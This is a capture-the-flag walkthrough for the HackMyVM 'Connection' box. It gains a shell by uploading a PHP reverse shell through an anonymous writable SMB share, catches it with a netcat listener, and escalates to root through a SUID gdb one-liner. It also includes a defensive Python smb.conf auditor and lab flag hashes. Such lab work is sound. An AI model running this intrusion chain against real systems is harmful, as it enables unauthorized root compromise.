HackMyVM - Connection

Connection

scan

❯ rustscan -a  192.168.0.104
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack

web

❯ gobuster dir -u http://192.168.0.104 -w ~/ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
/server-status (Status: 403) [Size: 278]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================

smb

file upload

reverseShell

❯ smbclient --list=192.168.0.104 --no-pass
Can't load /etc/samba/smb.conf - run testparm to debug it
Anonymous login successful

Sharename Type Comment
--------- ---- -------
share Disk
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Private Share for uploading files)
SMB1 disabled -- no workgroup available

❯ enum4linux -a -o 192.168.0.104
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug 8 17:47:46 2025

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

❯ smbclient //192.168.0.104/share -N
smb: \> cd html
smb: \html\> ls
index.html N 10701 Wed Sep 23 09:48:45 2020

smb: \html\> put reverseShell.php
putting file reverseShell.php as \html\reverseShell.php (3818.0 kb/s) (average 3818.4 kb/s)
smb: \html\> ls
. D 0 Fri Aug 8 18:12:41 2025
.. D 0 Wed Sep 23 09:48:39 2020
index.html N 10701 Wed Sep 23 09:48:45 2020
reverseShell.php A 3910 Fri Aug 8 18:12:41 2025
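The foothold above exists because an anonymous Samba share is writable and rooted in the Apache document root, so anything uploaded there becomes a reachable PHP file. The following is an added defender's check, not part of the original writeup: it parses an smb.conf (a constructed sample that mirrors the box's share, not its real config) and flags shares that are guest-accessible, writable and located under a web root. The web-root list and the Samba key synonyms it understands are assumptions written into the code.

```python
"""Audit smb.conf for guest-writable shares that expose a web document root."""
import configparser
from pathlib import PurePosixPath

# Constructed sample (not the box's real config) of the misconfiguration behind the
# foothold above: an anonymous, writable share rooted at the Apache document root.
SAMPLE_SMB_CONF = """
[global]
   server role = standalone server
[share]
   comment = Private Share for uploading files
   path = /var/www
   guest ok = yes
   writable = yes
[print$]
   path = /var/lib/samba/printers
   read only = yes
"""
WEB_ROOTS = ("/var/www", "/srv/http", "/usr/share/nginx/html")  # assumed web roots
TRUE = {"yes", "true", "1"}

def _is_true(section, *keys):
    """True if any of the synonymous boolean keys is enabled in this section."""
    return any(section.get(k, "").strip().lower() in TRUE for k in keys)

def share_is_writable(section):
    """Samba: 'read only = no' means the same as 'writable/writeable/write ok = yes'."""
    if "read only" in section:
        return section["read only"].strip().lower() not in TRUE
    return _is_true(section, "writable", "writeable", "write ok")

def path_under_web_root(path):
    p = PurePosixPath(path)
    return any(p == PurePosixPath(r) or PurePosixPath(r) in p.parents for r in WEB_ROOTS)

def find_risky_shares(conf_text):
    """Names of shares that are guest-accessible, writable and inside a web root."""
    # interpolation=None: smb.conf macros such as %U would otherwise trip configparser
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(conf_text)
    risky = []
    for name in cp.sections():
        s = cp[name]
        if name != "global" and _is_true(s, "guest ok", "public") \
                and share_is_writable(s) and path_under_web_root(s.get("path", "")):
            risky.append(name)
    return risky

print("guest-writable web-root shares:", find_risky_shares(SAMPLE_SMB_CONF))
```

Run it against the real /etc/samba/smb.conf by passing its contents to find_risky_shares; any share it returns lets an unauthenticated client drop executable content into the web tree.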

suid gdb

❯ rlwrap nc -lvnp 8848
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c "import pty; pty.spawn('/bin/bash');"

www-data@connection:/home/connection$ cat local.txt
cat local.txt
3f491443a2a6aa82bc86a3cda8c39617

www-data@connection:/$ find / -perm -u=s -type f 2>/dev/null | xargs ls -la
find / -perm -u=s -type f 2>/dev/null | xargs ls -la
-rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
-rwsr-sr-x 1 root root 8008480 Oct 14 2019 /usr/bin/gdb
-rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign

www-data@connection:/$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
# cd root
cd root
# ls -al
ls -al
total 24
drwx------ 3 root root 4096 Sep 22 2020 .
drwxr-xr-x 18 root root 4096 Sep 22 2020 ..
lrwxrwxrwx 1 root root 9 Sep 22 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Sep 22 2020 .local
lrwxrwxrwx 1 root root 9 Sep 22 2020 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwx------ 1 root root 33 Sep 22 2020 proof.txt
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cat proof.txt
cat proof.txt
a7c6ea4931ab86fb54c5400204474a39